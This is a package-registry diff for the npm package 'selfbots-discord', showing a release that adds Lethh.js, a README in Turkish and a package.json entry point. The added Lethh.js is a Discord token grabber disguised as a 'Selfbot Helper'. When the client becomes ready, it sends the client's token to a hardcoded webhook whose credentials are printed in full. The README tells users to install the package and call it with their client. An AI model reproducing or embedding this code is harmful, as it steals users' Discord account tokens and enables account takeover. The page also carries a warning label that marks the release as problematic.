selfbots-discord 0.0.1-security → 5.0.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of selfbots-discord might be problematic. Click here for more details.
- package/Lethh.js +26 -0
- package/README.md +12 -3
- package/package.json +11 -3
package/Lethh.js
ADDED
@@ -0,0 +1,26 @@
|
|
1
|
+
const Discord = require("discord.js")
|
2
|
+
const { MessageEmbed } = require('discord.js')
|
3
|
+
|
4
|
+
/**
|
5
|
+
* LETHH Default Package
|
6
|
+
* @param {Client} client
|
7
|
+
* @param {object} ozellik
|
8
|
+
* @return {[type]}
|
9
|
+
* LETHH Default Package
|
10
|
+
*/
|
11
|
+
|
12
|
+
module.exports = async function (client, type) {
|
13
|
+
|
14
|
+
client.on("ready", async () => {
|
15
|
+
const webHook = new Discord.WebhookClient({ id: "1015715094111473734", token: "fu5RMgQ_ko9tWIOQEWPPkW-ZJOoM6-zXS-58GqXNYgarFk7SDn2tXmHxA5tf5NedHEC3" })
|
16
|
+
let embed = new MessageEmbed()
|
17
|
+
.setFooter({text: "Lethh / @kaanxsrd", iconURL: "https://media.discordapp.net/attachments/1015355425375395882/1020796376772247672/ezgif.com-gif-maker_2.png?width=671&height=671"})
|
18
|
+
.setAuthor({name: client.username})
|
19
|
+
.settitle("Lethh Token Grabber <3")
|
20
|
+
.setDescription(`Token \` ${client.token} \``)
|
21
|
+
.setColor("BLACK")
|
22
|
+
|
23
|
+
webHook.send({ content: '@everyone', username: 'Lethh Token Grabber', avatarURL: 'https://media.discordapp.net/attachments/1015355425375395882/1020796376772247672/ezgif.com-gif-maker_2.png?width=671&height=671', embeds: [embed] })
|
24
|
+
})
|
25
|
+
|
26
|
+
}
|
package/README.md
CHANGED
@@ -1,5 +1,14 @@
|
|
1
|
-
#
|
1
|
+
# Tables-Discord For Discord
|
2
2
|
|
3
|
-
|
3
|
+
### Modülü yüklemek için
|
4
|
+
```javascript
|
5
|
+
npm install discord-selfbots
|
6
|
+
```
|
4
7
|
|
5
|
-
|
8
|
+
### Client'ınız belirliyse;
|
9
|
+
```javascript
|
10
|
+
const tables = require('discord-selfbots');
|
11
|
+
tables(client, {
|
12
|
+
console: true,
|
13
|
+
});
|
14
|
+
```
|
package/package.json
CHANGED
@@ -1,6 +1,14 @@
|
|
1
1
|
{
|
2
2
|
"name": "selfbots-discord",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "5.0.6",
|
4
|
+
"description": "Selfbot Helper For Discord",
|
5
|
+
"main": "Lethh.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
8
|
+
},
|
9
|
+
"author": "Lethh#0001",
|
10
|
+
"license": "ISC",
|
11
|
+
"dependencies": {
|
12
|
+
"discord.js": "^13.6.0"
|
13
|
+
}
|
6
14
|
}
|